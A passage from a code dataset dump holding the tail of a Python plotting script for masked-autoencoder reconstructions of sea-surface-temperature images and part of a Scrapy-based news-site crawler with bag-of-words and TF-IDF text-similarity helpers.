FIX!')\n diff_true = recon_img - orig_img\n bias = np.median(diff_true[np.abs(diff_true)>0.])\n\n # Find the patches\n p_sz = 4\n patches = patch_analysis.find_patches(mask_img, p_sz)\n upatches = patch_analysis.find_patches(unmasked, p_sz)\n\n\n fig = plt.figure(figsize=(9, 4))\n plt.clf()\n gs = gridspec.GridSpec(1,4)\n ax0 = plt.subplot(gs[0])\n\n _, cm = plotting.load_palette()\n cbar_kws={'label': 'SSTa (K)',\n 'fraction': 0.0450,\n 'location': 'top'}\n\n _ = sns.heatmap(np.flipud(orig_img), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, \n cbar_kws=cbar_kws,\n ax=ax0)\n\n # Reconstructed\n sub_recon = np.ones_like(recon_img) * np.nan\n # Difference\n diff = np.ones_like(recon_img) * np.nan\n frecon = recon_img.copy()\n\n # Plot/fill the patches\n for kk, patch in enumerate(patches):\n i, j = np.unravel_index(patch, mask_img.shape)\n \n # Fill\n sub_recon[i:i+p_sz, j:j+p_sz] = recon_img[i:i+p_sz, j:j+p_sz]\n frecon[i:i+p_sz, j:j+p_sz]\n # ???\n diff[i:i+p_sz, j:j+p_sz] = diff_true[i:i+p_sz, j:j+p_sz]\n if apply_bias:\n sub_recon[i:i+p_sz, j:j+p_sz] = recon_img[i:i+p_sz, j:j+p_sz] - bias\n frecon[i:i+p_sz, j:j+p_sz] -= bias\n # ???\n diff[i:i+p_sz, j:j+p_sz] = diff_true[i:i+p_sz, j:j+p_sz] - bias\n \n\n\n # Reconstructed\n usub_recon = np.ones_like(recon_img) * np.nan\n # Difference\n udiff = np.ones_like(recon_img) * np.nan\n ufrecon = recon_img.copy()\n\n # Plot/fill the patches\n for kk, patch in enumerate(upatches):\n i, j = np.unravel_index(patch, unmasked.shape)\n # Fill\n usub_recon[i:i+p_sz, j:j+p_sz] = orig_img[i:i+p_sz, j:j+p_sz]\n ufrecon[i:i+p_sz, j:j+p_sz]\n # ???\n udiff[i:i+p_sz, j:j+p_sz] = diff_true[i:i+p_sz, j:j+p_sz]\n\n # Unmasked image\n ax1 = plt.subplot(gs[1])\n\n u_recon = False\n if u_recon:\n usub_recon = ufrecon.copy()\n _ = sns.heatmap(np.flipud(usub_recon), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, cbar_kws=cbar_kws,\n ax=ax1)\n\n # Recon image\n ax2 = plt.subplot(gs[2])\n\n full_recon = True\n if apply_bias:\n cbar_kws['label'] = 'SSTa (K) ({:.3f} bias)'.format(bias)\n if full_recon:\n sub_recon = frecon.copy()\n _ = sns.heatmap(np.flipud(sub_recon), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, cbar_kws=cbar_kws,\n ax=ax2)\n\n # Residual image\n ax3 = plt.subplot(gs[3])\n\n cbar_kws['label'] = 'Residuals (K)'\n _ = sns.heatmap(np.flipud(diff), xticklabels=[], \n vmin=vmnx[2], vmax=vmnx[3],\n yticklabels=[], cmap='bwr', cbar=True,\n square=True, \n cbar_kws=cbar_kws,\n ax=ax3)\n\n # Borders\n # \n for ax, title in zip( [ax0, ax1, ax2 ,ax3],\n ['Original', 'Masked', 'Reconstructed', 'Residuals']):\n ax.patch.set_edgecolor('black') \n ax.patch.set_linewidth(1.) 
\n        #\n        show_title=True\n        if show_title:\n            ax.set_title(title, fontsize=14, y=-0.13)\n    \n    # Plot title\n    table = pd.read_parquet(LL_file, engine='pyarrow',columns=['pp_idx', 'LL'])\n    table = table[table['LL'].notna()]\n    table = table.sort_values(by=['pp_idx'])\n    LL = int(table.iloc[idx]['LL'])\n    #fig.suptitle('{LL} LL Reconstruction: t{model} {p}% masking'.format(LL=LL))\n    fig.suptitle('{LL} LL Reconstruction'.format(LL=LL))\n    \n    plt.tight_layout(pad=0.5, h_pad=0.5, w_pad=0.5)\n    plt.savefig(outfile, dpi=300)\n    plt.close()\n    print('Wrote {:s}'.format(outfile))\n    \n    return\n    \n    \ndef figs_imgs(idx=85674, \n              filepath=os.path.join(os.getenv('OS_OGCM'),\n                                    'LLC', 'Enki', 'PreProc', \n                                    'MAE_LLC_valid_nonoise_preproc.h5'), \n              table = os.path.join(os.getenv('OS_OGCM'),\n                                   'LLC', 'Enki', 'Tables', \n                                   'MAE_LLC_valid_nonoise.parquet')):\n    \"\"\"\n    Create fig\n    \"\"\"\n    # load file and model\n    f = h5py.File(filepath, 'r')\n    model_filepath_t50=os.path.join(os.getenv('OS_OGCM'),'LLC', 'Enki', \n                                    'Models','Enki_t50_399.pth')\n    model_filepath_t75=os.path.join(os.getenv('OS_OGCM'),'LLC', 'Enki', \n                                    'Models','Enki_t75_399.pth')\n    \n    model50 = prepare_model(model_filepath_t50, 'mae_vit_LLC_patch4')\n    print('Model50 loaded.')\n    model75 = prepare_model(model_filepath_t75, 'mae_vit_LLC_patch4')\n    print('Model75 loaded.')\n    \n    # Reconstruct Corners_Example\n    idx = 330469\n    seed = 69\n    img = f['valid'][idx][0]\n    img.resize((64,64,1))\n    torch.manual_seed(seed)\n    recon_img, mask, full_recon = run_one_image(img, model50, 0.50)\n    orig_img = img.squeeze()\n    \n    plot_recon(orig_img, recon_img, mask, idx, apply_bias=False, outfile='reconstructing_corners.png')\n    \n    \n    # Reconstruct t75 example 1\n    idx = 666\n    seed = 666\n    img = f['valid'][idx][0]\n    img.resize((64,64,1))\n    torch.manual_seed(seed)\n    recon_img, mask, full_recon = run_one_image(img, model75, 0.75)\n    orig_img = img.squeeze()\n    \n    plot_recon(orig_img, recon_img, mask, idx, apply_bias=False, outfile='1.png')\n    \n    \n    # Reconstruct t75 example 2\n    idx = 2365\n    seed = 345\n    img = f['valid'][idx][0]\n    img.resize((64,64,1))\n    torch.manual_seed(seed)\n    recon_img, mask, full_recon = run_one_image(img, model75, 0.75)\n    orig_img = img.squeeze()\n    \n    plot_recon(orig_img, recon_img, mask, idx, apply_bias=False, outfile='2.png')\n    \n    return\n    \n##############################################################\n# ------------------------ Plot Loss -------------------------\n##############################################################\ndef parse(d):\n    dictionary = dict()\n    # Removes curly braces and splits the pairs into a list\n    pairs = d.strip('{}').split(', ')\n    for i in pairs:\n        pair = i.split(': ')\n        # Other symbols from the key-value pair should be stripped.\n        dictionary[pair[0].strip('\\'\\'\\\"\\\"')] = float(pair[1].strip('\\'\\'\\\"\\\"'))\n    return dictionary\n\ndef plot_loss(filepath='data/log.txt', outfile='loss.png'):\n    loss = []\n    file = open(filepath, 'rt')\n    lines = file.read().split('\\n')\n    for l in lines:\n        if l != '':\n            dictionary = parse(l)\n            loss.append(dictionary)\n    file.close()\n\n    # fixed: pandas is imported as pd\n    df = pd.DataFrame(loss)\n    f, ax = plt.subplots(figsize=(5, 5))\n    sns.lineplot(data = df, x = 'epoch', y = 'train_loss')\n    plt.yscale('log')\n    ax.tick_params(axis='y', which='both', direction='out', length=4, left=True,\n                   color='gray')\n    ax.grid(True, which='both', color='gray', linewidth=0.1)\n    plt.savefig(outfile, dpi=300)\n    \n\n    \ndef plot_model_bias(filepath='enki_bias_LLC.csv', outfile='model_biases.png'):\n    biases = pd.read_csv(filepath)\n    colors = ['b','g','m','c']\n    
models = [10,35,50,75]\n    x = [10,20,30,40,50]\n    \n    fig, ax = plt.subplots()\n    plt_labels = []\n    \n    for i in range(4):\n        p = biases[i*5:i*5+5]\n        y = p['mean'].to_numpy()\n        plt_labels.append('t={}%'.format(models[i]))\n        ax.scatter(x, y, color=colors[i], zorder=i+2, s=15)\n\n    plt_labels.append('0 bias')\n    x = np.linspace(0, 55, 50)\n    y = np.zeros(50)\n    \n    ax.plot(x,y,c='r',linestyle='dashed',linewidth=0.8,zorder=1)\n    \n    ax.set_axisbelow(True)\n    ax.grid(color='gray', linestyle='dashed', linewidth = 0.5)\n    plt.legend(labels=plt_labels, title='Masking Ratio',\n               title_fontsize='small', fontsize='small', fancybox=True)\n    #plt.title('Calculated Biases')\n    plt.xlabel(\"Masking Ratio (p)\")\n    plt.ylabel(\"Bias (K)\")\n    plt.xlim([5, 55])\n    \n    # save\n    plt.savefig(outfile, dpi=300)\n    plt.close()\n    print(f'Wrote: {outfile}')\n    return\n\ndef figs_bias_hist(orig_file='data/MAE_LLC_valid_nonoise_preproc.h5',\n                   recon_file = 'data/mae_reconstruct_t75_p10.h5',\n                   mask_file = 'data/mae_mask_t75_p10.h5'):\n    # Load up images\n    f_orig = h5py.File(orig_file, 'r')\n    f_recon = h5py.File(recon_file, 'r')\n    f_mask = h5py.File(mask_file, 'r')\n\n    median_offsets = []\n    mean_offsets = []\n    for idx in range(10000):\n        orig_img = f_orig['valid'][idx,0,...]\n        recon_img = f_recon['valid'][idx,0,...]\n        mask_img = f_mask['valid'][idx,0,...]\n\n        diff_true = recon_img - orig_img \n\n        median_offset = np.median(diff_true[np.abs(diff_true) > 0.])\n        mean_offset = np.mean(diff_true[np.abs(diff_true) > 0.])\n        #mean_img = np.mean(orig_img[np.isclose(mask_img,0.)])\n        # Save\n        median_offsets.append(median_offset)\n        mean_offsets.append(mean_offset)\n    \n    # fixed: pandas is imported as pd\n    df = pd.DataFrame({'median_offset': median_offsets,\n                       'mean_offset': mean_offsets})\n    \n    ax = sns.histplot(df, x='mean_offset')\n    plt.vlines(x=0.0267, ymin=0, ymax=600, colors='red', ls='--', label='bias (0.0267)')\n    plt.legend(loc='upper left')\n    ax.set_xlim(-0.1, 0.1)\n    \n    plt.savefig('bias_histogram.png', dpi=300)\n    plt.close()\n\n# Command line execution\nif __name__ == '__main__':\n\n    #figs_training()\n    fig_cloud_coverage()\n    #figs_imgs()","sub_path":"papers/MAE/Figures/py/mae_figs_thesis.py","file_name":"mae_figs_thesis.py","file_ext":"py","file_size_in_byte":20720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"214893592","text":"import re\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nimport sklearn\nimport nltk\nfrom string import punctuation\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom nltk.stem import PorterStemmer\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport urllib\nimport urllib3\n\nfrom urllib.parse import urlparse\nimport scrapy\n\nfrom ftfy import fix_encoding\n\nimport urllib.request\n\nimport json\nimport unicodedata\nimport collections.abc  # needed by writeText() below; collections was not imported\nfrom unidecode import unidecode \n#scrapy startproject f319 \n#scrapy crawl threads\n\n\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.selector import Selector\n\nfrom urllib import parse as UrlParser\nfrom pyquery import PyQuery\n\n\n\nimport validators\nfrom newspaper import Article\n\n\n\nfrom requests_html import HTMLSession\nfrom urllib.parse import urlparse, urljoin\nimport colorama\n\ncolorama.init()\n\nGREEN = colorama.Fore.GREEN\nGRAY = 
colorama.Fore.LIGHTBLACK_EX\nRESET = colorama.Fore.RESET\nYELLOW = colorama.Fore.YELLOW\nBLUE = colorama.Fore.BLUE\n\n# initialize the set of links (unique links)\ninternal_urls = set()\nexternal_urls = set()\n\n\nfrom urllib.parse import unquote\nfrom pathlib import PurePosixPath\nimport random2\n\ntotal_urls_visited = 0\n\n\n\n\n\nclass ThreadsSpider(scrapy.Spider):\n\tname = \"vy\"\n\t#folder_path = \"lo-gi\"\n\tprint(\"================================SCRAPY-WEBSITE================================\")\n\turl = input(\"Input website's url: \")\n\tresponse = requests.get(url)\n\tsoup = BeautifulSoup(response.text, 'html.parser')\n\tparsedUrl = UrlParser.urlparse(url)\n\n\tmy_stopwords = set(stopwords.words('english') + list(punctuation))\n\n\tsupportCategories = [\n\t'national', \n\t'world', \n\t'lifestyle',\n\t'travel', \n\t'entertainment',\n\t'technology', \n\t'finance',\n\t'sport',\n\t'news',\n\t'sports',\n\t'entertainments'\n\t]\n\n\tsupportCategories = [re.sub(r\"\\s|-\", '', category) for category in supportCategories]\n\n\tdef parse(self, response):\n\t\t\n\n\t\t\n\t\t#sef = crawl(response.url)\n\n\t\tarticle = Article(response.url)\n\t\tarticle.download()\n\t\tarticle.parse()\n\n\t\tsef = {'title':article.title}\n\n\n\t\tfol =response.meta.get('folder_pat')\n\n\t\tfilename = '%s.txt' % (sef['title'] + str(random2.randint(1,1000)))\n\n\n\t\twith open(fol+\"/\"+filename, 'wb') as f:\n\t\t\tf.write(response.body)\n\t\tself.log('Saved file %s' % filename)\n\n\n\n\tdef start_requests(self):\n\t\t#Check that the URL is valid\n\t\tdef __is_url__(self):\n\t\t\treturn validators.url(url)\n\n\t\tdef crawl(url):\n\t\t\t\n\t\t\tarticle = Article(url)\n\t\t\tarticle.download()\n\t\t\t# fixed: newspaper's Article has parse(), not parser()\n\t\t\tarticle.parse()\n\n\t\t\tresult = {'title':article.title}\n\n\t\t\treturn result\n\n\n\n\n\t\tdef writeText(path, content):\n\t\t\tfile = open(path, \"w\", encoding=\"utf-8\")\n\t\t\tif isinstance(content, str):\n\t\t\t\tfile.write(content)\n\t\t\telif (isinstance(content, collections.abc.Iterable)):\n\t\t\t\tfor item in content:\n\t\t\t\t\tfile.write(item + '\\n')\n\n\t\t\tfile.close()\n\t\t\n\n\n\t\tdef __get_all_link_backup(url):\n\t\t\tresponse = requests.get(url)\n\t\t\tsoup = BeautifulSoup(response.text, 'html.parser')\n\t\t\tall_link = []\n\t\t\tinformation = soup.find_all('a')\n\n\t\t\tfor data in information:\n\t\t\t\tall_link.append(data['href'])\n\n\t\t\treturn all_link\n\n\n\n\t\tdef __get_categories__(url,response, supportCategories):\n\t\t\tif (response.status_code != 200):\n\t\t\t\treturn None, 'status code is not 200'\n\n\t\t\tparsedUrl = UrlParser.urlparse(url)\n\n\t\t\tdoc = PyQuery(response.text)\n\t\t\tall_links = doc('a[href]')\n\n\t\t\tprocessedlink = {}\n\t\t\tcategories = []\n\t\t\tfor link in all_links:\n\t\t\t\tlink = doc(link)\n\t\t\t\thref = link.attr('href')\n\t\t\t\tparsedhref = UrlParser.urlparse(href)\n\t\t\t\tif not bool(parsedhref.hostname):\n\t\t\t\t\thref = \"{}://{}{}\".format(parsedUrl.scheme, parsedUrl.hostname, href)\n\n\t\t\t\tif href in processedlink:\n\t\t\t\t\tcontinue\n\n\t\t\t\tprocessedlink[href] = True\n\n\t\t\t\ttitle = link.text().strip()\n\t\t\t\ttitle_ = title.lower()\n\t\t\t\ttitle_ = re.sub(r\"\\s|-\", '', title_)\n\n\t\t\t\tif title_ in supportCategories:\n\t\t\t\t\tcategories.append((href, title))\n\n\t\t\treturn categories, None\t\t\t\t\n\n\t\tdef __get_text__(file):\n\t\t\tread_file = open(file, \"r\", encoding=\"utf-8\")\n\t\t\ttext = read_file.readlines()\n\t\t\ttext = ' '.join(text)\n\t\t\treturn text\n\n\t\tdef __clean_html__(text):\n\t\t\tsoup = 
BeautifulSoup(text, \"html.parser\")\n\t\t\treturn soup.get_text()\n\n\t\tdef __remove_special_character(text):\n\t\t\tstring = re.sub('[^\\w\\s]', '', text)\n\t\t\tstring = re.sub('\\s+', ' ', string)\n\t\t\tstring = string.strip()\n\t\t\treturn string\n\n\t\tdef __filter_texts__(txtArr):\n\t\t\tres = []\n\t\t\tfor i in range(len(txtArr)):\n\t\t\t\ttext_cleaned = __clean_html__(txtArr[i])\n\t\t\t\tsents = sent_tokenize(text_cleaned)\n\t\t\t\tsents_cleaned = [__remove_special_character(s) for s in sents]\n\t\t\t\ttext_sents_join = ' '.join(sents_cleaned)\n\t\t\t\twords = word_tokenize(text_sents_join)\n\t\t\t\twords = [word.lower() for word in words]\n\t\t\t\twords = [ps.stem(word) for word in words]\n\n\t\t\t\tsample = ''\n\t\t\t\tfor i in words:\n\t\t\t\t\tsample += i \n\t\t\t\t\tsample += \" \"\n\n\t\t\t\tres.append(sample)\n\n\t\t\treturn res\n\n\t\tdef writeText(path, content):\n\t\t\tfile = open(path, \"w\", encoding=\"utf-8\")\n\t\t\tif isinstance(content, str):\n\t\t\t\tfile.write(content)\n\t\t\telif (isinstance(content, collections.abc.Iterable)):\n\t\t\t\tfor item in content:\n\t\t\t\t\tfile.write(item + '\\n')\n\n\t\t\tfile.close()\n\n\t\tdef writeCountVectorizer(bow, bow1 ,outputName, o_path):\n\t\t\tf = open(o_path + \"/\" + outputName + \".txt\" , 'w+', encoding='utf-8')\n\t\t\t\t\n\t\t\tf.write(str(bow))\n\t\t\tf.write('\\n')\n\t\t\tf.write(str(bow1))\n\t\t\tf.close()\n\n\t\tdef outout(bow ,outputName, o_path):\n\t\t\tf = open(o_path + \"/\" + outputName + \".txt\" , 'w+', encoding='utf-8')\n\t\t\t\t\n\t\t\tf.write(str(bow))\n\t\t\t\n\t\t\tf.close()\n\n\n\t\tdef writeTfidfVectorizer(bow, bow1, bow3 ,outputName, o_path):\n\t\t\tf = open(o_path + \"/\" + outputName + \".txt\" , 'w+', encoding='utf-8')\n\t\t\t\n\t\t\tf.write(str(bow))\n\t\t\tf.write('\\n')\n\t\t\tf.write(str(bow1))\n\t\t\t# fixed: write bow3 (it was written as bow1 twice, leaving bow3 unused)\n\t\t\tf.write(str(bow3))\n\n\t\t\tf.close()\n\n\t\tdef CosiSim(x):\n\t\t\tcosinearry = []\n\t\t\tmyarray = []\n\t\t\tj = z = 0\n\t\t\tv = 1.00\n\t\t\twhile z < len(x):\n\t\t\t\twhile j < len(x):\n\t\t\t\t\tv = float(cosine_similarity(x[z],x[j]))\n\t\t\t\t\tmyarray.append(round(v,2))\n\t\t\t\t\tj += 1\n\t\t\t\tcosinearry.append(myarray)\n\t\t\t\tz += 1\n\t\t\treturn cosinearry\n\n\n\n\n\n\t\t\tdef __topics__(array_topics):\n\t\t\t\tfor i in range(len(array_topics)):\n\t\t\t\t\tprint(str(i + 1) + '. ' + str(array_topics))\n\n\n\t\t\tdef __choose_topics__(array_topics):\n\t\t\t\tfor i in range(len(array_topics)):\n\t\t\t\t\tprint(str(i + 1) + '. ' + str(array_topics))\n\n\t\t\t\t\n\t\t\n\n\n\t\tdef __BoW__(array):\n\t\t\tresult = CountVectorizer()\n\t\t\tbow = result.fit_transform(array).todense()\n\t\t\tbow1 = result.vocabulary_\n\n\t\t\tarray_BoW = []\n\t\t\tarray_BoW.append((bow, bow1))\n\n\t\t\treturn array_BoW\n\n\n\t\tdef __TF_IDF__(array):\n\t\t\ttf = TfidfVectorizer(analyzer='word', ngram_range=(1, 3), min_df=0, stop_words='english')\n\t\t\t# fixed: transform the array parameter (the global corpus_final was used instead)\n\t\t\ttf_idf_matrix = tf.fit_transform(array)\n\t\t\tfeature_names = tf.get_feature_names()\n\t\t\tdense = tf_idf_matrix.todense()\n\n\t\t\tarray_TF_IDF = []\n\t\t\tarray_TF_IDF.append((tf_idf_matrix, feature_names, dense))\n\n\t\t\treturn array_TF_IDF\n\n\n\t\tdef __show_topics__(categories):\n\t\t\tprint(\"========================CATEGORY=========================\")\n\n\t\t\tfor i in range(len(categories)):\n\t\t\t\tprint(' ' + str(i + 1) + '. 
' + str(categories[i][1]))\n\t\t\tprint(\"=========================================================\")\n\n\n\t\tdef __hylt__(array_list, categories):\n\t\t\tarray_result = []\n\n\t\t\tfor data in array_list:\n\t\t\t\t#print(str(data[1]))\n\t\t\t\tif (categories[-1] == \"/\"):\n\n\t\t\t\t\turl = categories \n\t\t\t\telse:\n\t\t\t\t\turl = categories + \"/\"\n\n\t\t\t\tfor x in range(len(data)):\n\t\t\t\t\tif (x != 0):\n\t\t\t\t\t\ttemp = []\n\t\t\t\t\t\tfor y in data[x]:\n\t\t\t\t\t\t\ttemp.append(y)\n\t\t\t\t\t\t#print(str(temp[0]))\n\t\t\t\n\t\t\t\t\t\t\turl = url + str(temp[0]) + \"/\"\n\t\t\t\t\t\t#print(str(url))\n\t\t\t\t\t\tarray_result.append(str(url))\n\n\t\t\t\t#print(str(url))\n\t\t\t\t#print(\"\\n\")\n\n\n\t\t\treturn array_result\n\n\t\tdef __url_hylt__(array_list, categories):\n\t\t\tarray_result = []\n\t\t\t\n\t\t\tfor data in array_list:\n\t\t\t\tresponse1 = requests.get(data)\n\t\t\t\tsoup1 = BeautifulSoup(response1.text, 'html.parser')\n\t\t\t\t\n\t\t\t\tinfomation = soup1.find_all('uri')\n\t\t\t\tprint(str(len(infomation)))\n\n\n\t\t\t\tcheck = \"https://edition.cnn.com/entertainment/\"\n\t\t\t\tcount_ = 1\n\n\n\n\t \n\t\t\t\tfor x in infomation:\n\t\t\t\t\tarray_result.append(x)\n\t\t\t\t\tprint(str(x))\n\t\t\t\t\t\n\n\n\n\n\n\n\n\n\t\t\treturn array_result\n\n\t\tdef __show_hylt__(array):\n\t\t\tchee = []\n\t\t\tfor data in array:\n\t\t\t\tchee.append(str(data[1]))\n\n\n\t\t\tlist_set = set(chee) \n\t\t # convert the set to the list \n\t\t\tunique_list = (list(list_set)) \n\t\t\tfor data in unique_list: \n\t\t\t\tprint(f\"{YELLOW}[*] : {data}{RESET}\")\n\n\n\n\n\t\tdef unique(list1): \n\t \n\t\t # insert the list to the set \n\t\t\tlist_set = set(list1) \n\t\t # convert the set to the list \n\t\t\tunique_list = (list(list_set)) \n\t\t\tarray = []\t\n\t\t\tfor data in unique_list: \n\t\t\t\tprint(f\"{YELLOW}[*] Internal link: {data}{RESET}\")\n\t\t\t\tarray.append(data)\n\t\t\treturn array\n\n\n\n\t\tdef is_valid(url):\n\t\t \"\"\"\n\t\t Checks whether `url` is a valid URL.\n\t\t \"\"\"\n\t\t parsed = urlparse(url)\n\t\t return bool(parsed.netloc) and bool(parsed.scheme)\n\t\tdef myFunc(e):\n\t\t return len(e)\n#ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n\t\tdef __show_elements_topics__(categories):\n\t\t\turl = categories\n\t\t\tprint(str(url))\n\t\t\turls = set()\n\t # domain name of the URL without the protocol\n\t#22-06\n\t\t\tdomain_name = urlparse(url).netloc\n\t\t #domain_name_backup = \"https://www.news.com.au/travel/\"\n\t\t \n\t\t #print(str(domain_name))\n\t\t #domain_name = urlparse(url).netloc\n\t\t # initialize an HTTP session\n\t\t\tsession = HTMLSession()\n\t\t # make HTTP request & retrieve response\n\t\t\tresponse = session.get(url)\n\n\n\n\t\t\tsample_de =PurePosixPath(\n\t\t unquote (\n\t\t urlparse(\n\t\t url\n\t\t ).path\n\t\t )\n\t\t ).parts[1]\n\n\t\t\t#print(str(sample_de))\n\n\n\n\n\t\t # execute Javascript\n\t\t\ttry:\n\t\t\t\tresponse.html.render()\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tsoup = BeautifulSoup(response.html.html, \"html.parser\")\n\t\t\tarray_root = [] #/\n\t\t\tarray_root_1 = [] #travel\n\t\t\tarray_root_2 = [] #(travel,destinations)\n\t\t\tarray_root_3 = [] #(destinations, europe)\n\t\t\tarray_root_4 = [] #(europe, etc....)\n\n\n\t\t\tfor a_tag in soup.findAll(\"a\"):\n\t\t\t\thref = a_tag.attrs.get(\"href\")\n\t\t\t\tif href == \"\" or href is None:\n\t\t # href empty 
tag\n\t\t\t\t\tcontinue\n\t\t # join the URL if it's relative (not absolute link)\n\t\t\t\thref = urljoin(url, href)\n\t\t\t\tparsed_href = urlparse(href)\n\t\t # remove URL GET parameters, URL fragments, etc.\n\t\t\t\thref = parsed_href.scheme + \"://\" + parsed_href.netloc + parsed_href.path\n\n\t\t #print(str(href))\n\n\t\t \n\n\n\t\t\t\tcount_sample = PurePosixPath(\n\t\t unquote (\n\t\t urlparse(\n\t\t href\n\t\t ).path\n\t\t )\n\t\t ).parts\n\n\t\t\t\tcount_count = len(count_sample)\n\n\t\t#get ROOT_1\n\t\t\t\ti = 0\n\t\t\t\tfor i in range(len(count_sample)):\n\t\t\t\t\tsample = PurePosixPath(\n\t\t\t\t\tunquote (\n\t\t urlparse(\n\t\t href\n\t\t ).path\n\t\t )\n\t\t ).parts[i]\n\t\t\t\t\tdomain_name_sample = urlparse(href).netloc\n\t\t\t\t\tif(i == 1):\n\t\t\t\t\t\tsample1 = PurePosixPath(\n\t\t\t\t\tunquote (\n\t\t urlparse(\n\t\t href\n\t\t ).path\n\t\t )\n\t\t ).parts[1]\n\t\t\t\t\t\tif((sample_de == sample1) &(domain_name == domain_name_sample) ):\n\t\t\t\t\t\t\tarray_root_1.append(href)\n\t\t\t\t\t\t\tbreak\n\n\n\t\t\t\t\tif((sample_de == sample) & (domain_name == domain_name_sample)):\n\t\t\t\t\t\tarray_root.append(href)\n\t\t\t\t\t\tbreak\n\n\n\n\t\t\n\t\t\tmax_count_root = 0\n\t\t\tfor data in array_root_1:\n\n\t\t\t\tcount_root = PurePosixPath(\n\t\t unquote (\n\t\t urlparse(\n\t\t data\n\t\t ).path\n\t\t )\n\t\t ).parts\n\n\t\t\t\tcount_count = len(count_root)\n\t\t\t\tif(count_count > max_count_root):\n\t\t\t\t\tmax_count_root = count_count \n\n\n\n\n\t\t\t#print(str(max_count_root))\n\t\t\tcheck = 2 \n\n\t\t\tarray_root_de = [set() for i in range(max_count_root - 3)]\n\t\t#lotsosets[0].add('see me?')\n\t\t\t\n\t\t\ttemp = []\n\t\t\t#print(array_root_de)\n\n\t\t\tfor data_root1 in array_root_1:\n\t\t\t\tcount_data_root1 = len(PurePosixPath(unquote(urlparse(data_root1).path)).parts)\n\t\t \n\t\t\t\tif( count_data_root1 >= 3 ):\n\t\t\t\t\t#print('--------------------------------------------------------------')\n\n\t\t\t\t\t#print(f\"{BLUE} {data_root1}{RESET}\")\n\t\t\t\t\t#print(f\"{GREEN}: {count_data_root1}{RESET}\")\n\t\t\t\t\tindex = [set() for i in range(count_data_root1 - 1 )]\n\t\t\t\t\t#print(index)\n\n\t\t\t\t\tfor i in range (1, count_data_root1 ):\n\t\t\t\t\t\tif(i != count_data_root1 ):\n\t\t\t\t\t\t\tsample = PurePosixPath(unquote(urlparse(data_root1).path)).parts[i]\n\t\t\t\t\t\t\tindex[i - 1].add(sample)\n\n\t\t\t\t\t\t\t#print(f\"{YELLOW}: {index[i-1]}{RESET}\")\n\n\n\t\t\t\t\t#print(index)\n\t\t #array_root_de[count_data_root1 - 3].append(index)\n\t\t #temp = []\n\t\t #temp.append(index)\n\t\t #print(temp)\n\t\t\t\t\ttemp.append(list(index))\n\n\n\n\t\t\ttemp.sort(reverse=True, key=myFunc)\n\n\t\t\t#for data in temp:\n\t\t\t\t#print(data)\n\t\t \n\n\t\t\tchee = []\n\t\t\tfor data in temp:\n\t\t\t\tchee.append(str(data[1]))\n\n\t\t\t\n\t\t\t#unique(chee)\n\t\t\treturn temp\n\n\n\n\n#ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n\t\tdef ___get_topics__(categories):\n\t\t\tobj = 0\n\t\t\tcheck = 0\n\t\t\twhile( (obj <= 0) | (obj > len(categories)) ):\n\t\t\t\tobj = int(input(\"Enter number to select category)\"))\n\t\t\t\tcheck = obj\n\t\t\t\tbreak\n\t\t\t\n\t\t\tarray_category = []\n\t\t\t#categories[i][0] = href\n\t\t\t#categories[i][1] = title\n\t\t\tarray_category.append((categories[check - 1][0], categories[check - 1 ][1]))\n\n\t\t\treturn array_category\n\n\n\n\n\t\tdef __create_dirPath__(categories):\n\t\t\tfor href, 
title in categories:\n\t\t\t\tdirPath_html = \"{}/{}/{}_html\".format(self.parsedUrl.hostname, title, title)\t\n\t\t\t\tdirPath_word = \"{}/{}/{}_word\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tdirPath_BoW = \"{}/{}/{}_BoW\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tdirPath_Tf_Idf = \"{}/{}/{}_Tf_Idf\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tdirPath_Cosine = \"{}/{}/{}_Cosine\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tdirPath_Precision = \"{}/{}/{}_Precision\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tdirPath_Recall = \"{}/{}/{}_Recall\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tdirPath_F_score = \"{}/{}/{}_Fscore\".format(self.parsedUrl.hostname, title, title)\n\t\t\t\tos.makedirs(dirPath_html, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_word, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_BoW, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_Tf_Idf, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_Cosine, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_Precision, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_Recall, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_F_score, exist_ok=True)\n\n\n\t\t\t\t#create dirPath Bow and TF-IDF inside Cosine\n\t\t\t\tdirPath_Cosine_BoW = \"{}/{}/{}_Cosine/{}\".format(self.parsedUrl.hostname, title, title,\"BoW\")\n\t\t\t\tdirPath_Cosine_Tf_Idf = \"{}/{}/{}_Cosine/{}\".format(self.parsedUrl.hostname, title, title, \"Tf_Idf\")\n\t\t\t\tos.makedirs(dirPath_Cosine_BoW, exist_ok=True)\n\t\t\t\tos.makedirs(dirPath_Cosine_Tf_Idf, exist_ok=True)\n\n\n\n\t\tps = 